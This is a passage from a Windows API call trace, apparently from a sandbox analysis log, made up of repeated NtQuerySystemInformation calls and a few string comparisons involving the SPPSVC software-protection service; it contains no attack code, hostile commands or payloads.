Length=0x50, ResultLength=0x0) [0220.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0220.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0220.898] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0220.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0220.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0220.911] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0220.941] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0220.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0220.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0221.182] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") 